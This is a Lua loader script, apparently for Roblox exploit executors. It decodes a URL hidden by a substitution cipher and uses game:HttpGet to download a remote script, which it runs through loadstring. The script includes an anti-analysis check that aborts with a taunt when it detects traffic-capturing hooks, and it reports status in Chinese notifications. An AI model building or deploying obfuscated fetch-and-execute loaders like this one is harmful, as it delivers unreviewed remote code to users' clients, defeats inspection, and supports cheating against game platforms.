local MAP={
["Ψ"]="://",[""]="==",["Ġ"]=":",[")"]="/",["}"]=".",["H"]="-",["û"]="_",[""]="?",
["Ω"]="&",["¦"]="#",["ă"]="@",["ç"]="+",[""]="~",["ā"]="!",[""]='"',["Ŧ"]="'",
["ĝ"]=",",["ř"]=";",["&"]="`",["Ŗ"]="|",["©"]="(",["@"]=")",["€"]="{",["Č"]="}",
["Ž"]="a",["q"]="b",["Ŀ"]="c",["g"]="d",["ĕ"]="e",["ë"]="f",["ŏ"]="g",["C"]="h",
["¡"]="i",["đ"]="j",["™"]="k",["ą"]="l",["ÿ"]="m",["Ń"]="n",["ø"]="o",["ē"]="p",
["Ì"]="q",["ŗ"]="r",["Û"]="s",["ŧ"]="t",[""]="u",["j"]="v",["O"]="w",["Ñ"]="x",
["ő"]="y",["ü"]="z"
}

local function decrypt(s)
    local out={}
    for i=1,#s do
        local c=s:sub(i,i)
        out[#out+1]=MAP[c] or c
    end
    return table.concat(out)
end

local function notify(text)
    pcall(function()
        game:GetService("StarterGui"):SetCore("SendNotification",{
            Title="［星云安全系统］",
            Text=text,
            Duration=5
        })
    end)
end

local function detectHook()
    local env = getfenv and getfenv() or _G
    return env.syn or env.http_request or env.request or env.fluxus
end

return function(enc)
    local url = decrypt(enc)

    if detectHook() then
        notify("抓包好玩吗？")
        return
    end

    local ok, src = pcall(function()
        return game:HttpGet(url)
    end)
    if not ok or type(src)~="string" then
        notify("获取远程脚本失败")
        return
    end

    if type(loadstring)~="function" then
        notify("loadstring 不可用")
        return
    end

    local fn, err = loadstring(src)
    if not fn then
        notify("加载脚本失败: "..tostring(err))
        return
    end

    local success, result = pcall(fn)
    if success then
        notify("脚本已加载")
    else
        notify("脚本执行失败: "..tostring(result))
    end

    return result
end
